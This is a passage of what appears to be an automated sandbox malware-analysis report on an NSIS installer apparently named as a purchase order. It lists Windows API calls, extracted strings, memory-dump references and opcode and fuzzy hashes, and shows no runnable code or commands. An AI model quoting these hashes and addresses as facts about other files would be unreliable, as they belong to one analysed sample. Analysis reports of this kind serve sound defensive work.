                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                                  • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                                  • Opcode Fuzzy Hash: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                                  • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                                  • GetMessagePos.USER32 ref: 00404CA3
                                                  • ScreenToClient.USER32(?,?), ref: 00404CBD
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                  • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                                  • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                                  • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402E90
                                                  • wsprintfA.USER32 ref: 00402EA0
                                                  • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402E9A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                                  • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                                  • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                                  • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                                  • wsprintfA.USER32 ref: 00406697
                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004066AB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                  • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                                  • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                  • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q
                                                  • API String ID: 0-2858235012
                                                  • Opcode ID: 972f26fbf8a0ea2e20ca532729eb2f7f14435c370bc3aa3e2d3eca0e5838d8e1
                                                  • Instruction ID: 19764708c90cd2389562c2cda1e51eff2ab89ac76fc3e66d98afff54aced82fb
                                                  • Opcode Fuzzy Hash: 972f26fbf8a0ea2e20ca532729eb2f7f14435c370bc3aa3e2d3eca0e5838d8e1
                                                  • Instruction Fuzzy Hash: 56916E74A04209DFEF14DBA6C994BAEB7B6FF84340F208929D411AB295DBB49D45CBC0
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                                  • GlobalFree.KERNEL32(?), ref: 004028C9
                                                  • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                                  • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                                  • Opcode Fuzzy Hash: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                                  • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 551687249-2449383134
                                                  • Opcode ID: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                                  • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                                  • Opcode Fuzzy Hash: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                                  • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                                  APIs
                                                  • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                                  • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                                  • CharNextA.USER32(0000000C,?,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                                  • CharPrevA.USER32(0000000C,0000000C,763F3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                                  • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                                  • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                                  • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $~q$$~q$$~q$$~q$$~q$$~q
                                                  • API String ID: 0-2846834050
                                                  • Opcode ID: e77e3e12f0ade9c92894080de615fc5552f71838d83f332aa5479dfdaf16e915
                                                  • Instruction ID: 0c24a7de7e28b94e56ed68fcdbea0759c0f76c5dcf8629dc15eb5a8ad550f5a0
                                                  • Opcode Fuzzy Hash: e77e3e12f0ade9c92894080de615fc5552f71838d83f332aa5479dfdaf16e915
                                                  • Instruction Fuzzy Hash: B1F17C74B00205CFDB19DFA5C490A5EB7B2FF88301F258529D816AB399CBB1ED46CB85
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017BD
                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A430,0040A430,00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017E7
                                                    • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                                    • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,763F23A0), ref: 0040542D
                                                    • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                                  • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                                  • Opcode Fuzzy Hash: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                                  • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                                  APIs
                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                                  • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                                  • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                                  • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401DA3
                                                  • GetClientRect.USER32(?,?), ref: 00401DF1
                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                                  • DeleteObject.GDI32(00000000), ref: 00401E45
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                                  • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                                  • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                                  • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E5D
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                                  • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                                  • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                                  • Opcode Fuzzy Hash: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                                  • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                                  • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                                  • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                                  • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                                  • wsprintfA.USER32 ref: 00404C1C
                                                  • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                                  • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                                  • Opcode Fuzzy Hash: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                                  • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020F5
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                                    • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                                    • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,763F23A0), ref: 0040542D
                                                    • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                                    • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                                  • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                                  • Opcode Fuzzy Hash: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                                  • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                                  • GetTickCount.KERNEL32 ref: 00402EFE
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                                  • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                                  • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                                  • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                                  • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405374
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                                    • Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
